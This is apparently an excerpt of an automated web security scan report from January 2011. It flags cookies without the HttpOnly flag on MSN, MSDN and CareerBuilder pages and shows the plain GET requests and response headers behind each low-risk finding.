The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /market-news/post.aspx HTTP/1.1 Host: money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: MC1=V=3&GUID=fc74895a2afe4dbb8b81357837158fa3; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM05 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 29 Jan 2011 23:47:56 GMT Content-Length: 43288
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mutual-fund/default-dyn.aspx HTTP/1.1 Host: money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: MC1=V=3&GUID=78fc912bcfc74a00b174e74deda213d4; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM08 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 29 Jan 2011 23:47:57 GMT Content-Length: 60626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /saving-money/50-30-20-budget.aspx HTTP/1.1 Host: money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: MC1=V=3&GUID=4d2c950ddf854b40a5add97ca57f1813; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM07 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 29 Jan 2011 23:48:06 GMT Content-Length: 33106
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Sat, 29 Jan 2011 23:48:16 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET pragma: no-cache Location: http://moneycentral.msn.com/home.asp Content-Length: 157 Content-Type: text/html Set-Cookie: MUID=74239CED20224902AC862552C566F9F3; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://moneycentral.redacted/home.asp">here</a>.</body>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /detail/stock_quote HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Connection: close Date: Sat, 29 Jan 2011 23:48:21 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://investing.money.redacted/investments/stock-price Set-Cookie: MUID=f1e153930f7d43c7a9fd16af4cdded3a; domain=.redacted; expires=Tue, 29-Jan-2013 23:48:21 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 171
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /inc/Attributions.asp HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:48:25 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET cache-control: private pragma: no-cache Content-Length: 26240 Content-Type: text/html Expires: Sat, 29 Jan 2011 23:48:25 GMT Set-Cookie: MUID=BBC5C4C59F664372B83E2469BBE8E1C0; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head> <tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal-finance/ HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 29 Jan 2011 23:48:20 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://money.redacted/personal-finance/ Set-Cookie: MUID=eeb0f31a74744b6db817f50168fe01ae; domain=.redacted; expires=Tue, 29-Jan-2013 23:48:20 GMT; path=/ Cache-Control: private Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 88675 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=8a183991ad5843ecb33290e9ed7a7542; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> MSN Movies ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /academy-awards/snubs/ HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 43284 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=315a7361d2a9433cbd6de273a6f46301; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jason-statham/photo-gallery/feature/ HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 38350 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=bd071d931c99456bbb919ea6d508c2bf; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> A Beginner ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mom-pop-culture/tiger-mom-movie/story-feature/ HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 48526 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=edacaf4cfdd14387b49aebcecaca1296; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Mom & ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /new-on-dvd/movies/ HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 48135 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=644af2bf6b11442a9276943bf18262ae; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Movies New ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 49419 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=2f4ba9c5a4c34145987ce8f93d87a3b5; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Parallel U ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/ HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 52719 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=5ff4b00728d9439c8b366e737607dbdc; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Parallel U ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /showtimes/showtimes.aspx HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /the-rundown/the-guard/story_5/ HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 65403 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=423319e9829a41ada11054b6866c7b97; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> MSN Movies ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /en-us/ Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: A=I&I=AxUFAAAAAAD6BwAA2FAL8QpHJ6ENcoug1+VHkA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:23:48 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Set-Cookie: A=I&I=AxUFAAAAAAD6BwAA2FAL8QpHJ6ENcoug1+VHkA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:23:48 GMT; path=/; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:23:50 GMT Content-Length: 124
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/en-us/">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/library/cc838158(VS.95 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 13126 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: A=I&I=AxUFAAAAAAC+BgAA/LKUz1RDYrDrBIShzmD0CQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:20 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:26:20 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/library/cc838158(VS.95).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 29998 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: A=I&I=AxUFAAAAAAAvCAAAAHhoQDRGOCpGUJGGvUjPzg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: A=I&I=AxUFAAAAAAC5BwAAZhvvn/BBIrR1Pt6imQlAcw!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: TocHashCookie=ms310241(n)/aa139615(n)/cc838813(VS.95,n)/; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Set-Cookie: A=I&I=AxUFAAAAAAC5BwAAZhvvn/BBIrR1Pt6imQlAcw!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:26:14 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/library/ff637515(VS.92 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14228 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: A=I&I=AxUFAAAAAACxBwAAsl7l0ihNIHEg4m248bhSNg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:26:22 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/library/ff637515(VS.92).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21669 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: A=I&I=AxUFAAAAAACeBwAAfX4UyXJKIqHwEP+0sulhJA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: A=I&I=AxUFAAAAAACPCQAACkbcHwtHFnbPetyIMGIFSQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: TocHashCookie=ms310241(n)/aa187916(n)/ff403849(VS.92,n)/na/; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Set-Cookie: A=I&I=AxUFAAAAAACPCQAACkbcHwtHFnbPetyIMGIFSQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:26:21 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jobseeker/jobs/jobResults.aspx HTTP/1.1 Host: msn.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 186049 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=fce2ee8d67554dafa8996a80449bf770-349642143-XI-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X1974D75CFDC14C842AF27C9499CC36681A09DA126FC89CDE67D6CB317A39CA4DEA45CDDE40FA597B269AF1D1F84882078; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:49:02 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEARWEB49 Date: Sat, 29 Jan 2011 23:49:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Job Se ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845 HTTP/1.1 Host: msnbc.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:22:03 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/ Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Sat, 29 Jan 2011 01:22:03 GMT Last-Modified: Mon, 31 Jan 2011 01:22:03 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www383 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44C9F5[CE]; Expires=Fri, 29 Jan 2016 02:16:21 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724 HTTP/1.1 Host: msnbc.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
